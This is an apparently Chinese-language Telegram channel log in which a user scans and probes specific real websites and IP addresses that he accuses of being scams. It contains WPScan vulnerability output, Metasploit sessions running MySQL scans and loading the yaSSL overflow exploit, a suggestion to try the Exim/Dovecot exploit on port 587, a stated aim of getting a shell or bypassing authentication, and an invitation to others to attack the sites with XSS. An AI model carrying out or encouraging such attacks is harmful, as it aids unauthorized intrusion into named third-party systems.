duangsues.is_a? SaltedFish
[+] WordPress version 4.8.3 (Released on 2017-10-31) identified from meta generator, links opml 从这个开始
和
~~萌妹~~ LWL12
对比骗子
LWL12.com 的运维质量一比 🌚~~萌妹~~ LWL12
[+] URL: https://blog.lwl12.com/
[+] robots.txt available under: 'https://blog.lwl12.com/robots.txt'
[+] Interesting entry from robots.txt: https://blog.lwl12.com/wp-
[+] WordPress version 4.9.5 (Released on 2018-04-03) identified from stylesheets numbers, advanced fingerprinting, links opml
[+] No plugins found
[+] Requests Done: 41
[+] Elapsed time: 00:00:07
对比骗子
[+] robots.txt available under: 'https://mightficent.com/robots.txt'
[+] Interesting entry from robots.txt: https://mightficent.com/wp-admin/admin-ajax.php
[+] WordPress version 4.8.3 (Released on 2017-10-31) identified from meta generator, links opml
[!] 10 vulnerabilities identified from the version number
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
[!] Title: WordPress Slider Revolution Shell Upload
[+] Requests Done: 402
[+] Elapsed time: 00:10:04
duangsues.is_a? SaltedFish
[+] WordPress version 4.8.3 (Released on 2017-10-31) identified from meta generator, links opml 从这个开始
目前对动苏来说只有 shell(拿到虚拟主机控制权) 和 bypass auth(cpanel 的或者 wordpress 的管理) 是有价值的, 即使的确有不少漏洞
duangsues.is_a? SaltedFish
很多都是 WordPress 站, 不信 WPScan 这些站其实都是 voukgroup.org (103.233.0.244) 分出来的虚拟主机, 前者使用 cPanel, WordPress 4.8.6 和 RHEL6 https://t.iss.one/dsuses/1357 他们「公司」的人注册的 https://charity100.org https://macademy.asia # 使用了 CF 防护 https://makefamousnow.com https://mega7holding.com…
XSS 狂热者可以去 XSS 一个, 也有一些网站是开放的 🌝
我这没公网服务器, 可惜没有啊.... ( 不然也可以拿来 XSS
我这没公网服务器, 可惜没有啊.... ( 不然也可以拿来 XSS
msf auxiliary(scanner/mysql/mysql_version) > run -j
[*] Auxiliary module running as background job 2.
[*] 103.233.0.244:3306 - 103.233.0.244:3306 is running MySQL, but responds with an error: \x04Host '27.27.54.51' is not allowed to connect to this MySQL server
[*] 103.233.0.244:3306 - Scanned 1 of 1 hosts (100% complete)
duangsues.is_a? SaltedFish
use exploit/linux/smtp/exim4_dovecot_exec 或许有效 voukgroup.org 等域名的 587 端口运行着 dovecot Exim
This media is not supported in your browser
VIEW IN TELEGRAM
duangsues.is_a? SaltedFish
大概的报告: 45.62.110.178.16clouds.com 80: Apache 2.2.15 bwg,,可以正常访问,收到一份网址列表 Linux 2.6 (CentOS) mmallv2u.net 80:Tengine 443:ssl 843:adobe-crossdomain 1935:tcpwrapped Tiandy NVR (89%), IPCop 2 firewall (Linux 3.4) (87%), Linux 3.2 (87%) 103.208.220.66 22:ssh…
msf auxiliary(scanner/mysql/mysql_login) > set RHOSTS m-darts.com
RHOSTS => m-darts.com
msf auxiliary(scanner/mysql/mysql_login) > run
[+] 110.4.45.141:3306 - 110.4.45.141:3306 - Found remote MySQL version 5.5.58
msf auxiliary(scanner/mysql/mysql_login) > use exploit/linux/mysql/mysql_yassl_hello
msf exploit(
linux/mysql/mysql_yassl_hello) > infoPlatform:
LinuxThis module exploits a stack buffer overflow in the yaSSL (1.7.5 and
earlier) implementation bundled with MySQL <= 6.0. By sending a
specially crafted Hello packet, an attacker may be able to execute
arbitrary code.
有可能 🌚 — 不行, 他们的版本还是太高 🌑